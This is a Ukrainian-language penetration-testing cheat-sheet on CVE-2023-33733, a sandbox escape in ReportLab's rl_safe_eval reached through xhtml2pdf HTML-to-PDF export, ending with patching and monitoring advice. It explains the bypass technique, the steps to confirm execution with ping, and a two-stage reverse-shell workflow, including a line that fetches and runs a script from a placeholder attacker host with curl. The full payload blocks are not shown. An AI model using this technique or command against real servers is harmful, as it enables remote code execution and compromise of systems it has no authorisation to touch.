Коли тестувати

• Додатки, які надають експорт HTML-to-PDF (профілі, рахунки, звіти) і показують xhtml2pdf/ReportLab у метаданих PDF або у коментарях HTTP-відповіді.
• exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer
• HTTP-відповідь для PDF часто починається з ReportLab generator comment

Як працює обхід sandbox

• rl_safe_eval видаляє або замінює багато builtins (getattr, type, pow, ...) і застосовує фільтрацію імен, щоб заборонити атрибути, що починаються з __ або є у denylist.
• Проте безпечні функції живуть у globals-словнику, доступному як func.globals.
• Використовуйте type(type(1)) щоб відновити реальну вбудовану функцію type (обминаючи wrapper від ReportLab), потім визначте клас Word, похідний від str, з мутованою поведінкою порівняння так, що:
  • .startswith('') → завжди False (обхід перевірки name startswith(''))
  • .eq повертає False лише при першому порівнянні (обхід перевірки членства у denylist) і True опісля (щоб Python getattr працював)
  • .hash = hash(str(self))
• За допомогою цього getattr(pow, Word('globals')) повертає globals dict обгорнутої функції pow, який містить імпортований модуль os. Далі: ['os'].system('').

Мінімальний патерн експлуатації (приклад для атрибута) Розмістіть payload всередині evaluated attribute і переконайтесь, що він повертає дійсне значення атрибута через boolean and 'red'.

exploit

• Форма з list-comprehension дозволяє один вираз, прийнятний для rl_safe_eval.
• Трейлінг and 'red' повертає дійсний CSS color, тож рендеринг не зламається.
• Замініть команду за потреби; використайте ping щоб перевірити виконання через tcpdump.

Операційний робочий процес

1. Ідентифікуйте PDF-генератор

• PDF Producer показує xhtml2pdf; HTTP-відповідь містить ReportLab comment.

2. Знайдіть input, що відображається в PDF (наприклад profile bio/description) і запустіть експорт.
3. Підтвердіть виконання низькошумним ICMP

• Run: sudo tcpdump -ni icmp
• Payload: ... system('ping <your_ip>') ...
• Windows часто відправляє рівно чотири echo requests за замовчуванням.

4. Встановіть шелл

• Для Windows надійний two-stage підхід уникає проблем з quoting/encoding:
• Stage 1 (download):

exploit

• Stage 2 (execute):

exploit

• Для Linux-таргетів можливий подібний two-stage з curl/wget:
• system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s')

Нотатки та поради

• Контексти атрибутів: color відомий як evaluated attribute; інші атрибути в ReportLab markup також можуть оцінювати вирази. Якщо одне місце санітайзиться, спробуйте інші, що рендеряться у PDF flow (різні поля, table styles тощо).
• Quoting: тримайте команди компактними. Two-stage завантаження значно зменшують проблеми з quoting та escaping.
• Надійність: якщо експорти кешуються або ставляться у чергу, трохи варіюйте payload (наприклад випадковий шлях або query), щоб уникнути кешування.

Захист та виявлення

• Оновіть ReportLab до 3.6.13 або новішої (CVE-2023-33733 виправлено). Слідкуйте також за security advisories у пакетах дистрибутивів.
• Не передавайте user-controlled HTML/markup безпосередньо у xhtml2pdf/ReportLab без суворої санітизації. Видаляйте/забороняйте [[[...]]] evaluation constructs та vendor-specific теги коли вхід ненадійний.
• Розгляньте відключення або обгортання використання rl_safe_eval повністю для ненадійних входів.
• Моніторьте підозрілі вихідні з’єднання під час генерації PDF (наприклад ICMP/HTTP від app servers при експорті документів).

References

• PoC and technical analysis: c53elyas/CVE-2023-33733
• 0xdf University HTB write-up (real-world exploitation, Windows two-stage payloads): HTB: University
• NVD entry (affected versions): CVE-2023-33733
• xhtml2pdf docs (markup/page concepts): xhtml2pdf docs